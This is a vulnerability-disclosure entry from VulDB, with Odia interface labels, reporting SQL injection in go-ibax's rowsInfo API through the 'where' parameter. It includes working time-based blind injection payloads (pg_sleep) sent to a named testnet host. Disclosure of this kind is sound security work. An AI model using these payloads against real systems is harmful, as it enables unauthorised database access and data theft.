ଜମା କରନ୍ତୁ #50344: SQL injection vulnerability in go-ibax via where parameterସୂଚନା

ଶୀର୍ଷକ	SQL injection vulnerability in go-ibax via where parameter
ବର୍ଣ୍ଣନା	SQL Injection vulnerability in /packages/api/database.go of go-ibax via where parameter .This issue affects versions starting from commits on Jul 18, 2020. file: https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189 commits: https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174 POC: Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo Request Method: POST PostData: order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1 ![](https://user-images.githubusercontent.com/116059491/197543392-cf34f447-e0ba-45f6-bc4a-07e9fc57f06d.png) as you can see, when I use pg_sleep, the request is delayed 10s. PostData: order=1&where=1=1%3b%3bselect+case+when((select+length(current_database()))=4)+then+pg_sleep(5)+else+pg_sleep(0)+end%3b--&table_name=pg_user&limit=1&page=1 ![](https://user-images.githubusercontent.com/116059491/197543541-e8ca77d7-1100-4231-955e-fff29baf672c.png) as you can see, when I use pg_sleep to judge the length of current_database , it shows 4.
ଉତ୍ସ	⚠️ https://github.com/IBAX-io/go-ibax/issues/2063
ଉପଭୋକ୍ତା	Tomy (UID 34751)
ଦାଖଲ	11/01/2022 12:42 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	11/01/2022 04:45 PM (4 hours later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	212638 [IBAX go-ibax /api/v2/open/rowsInfo where SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ	20

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!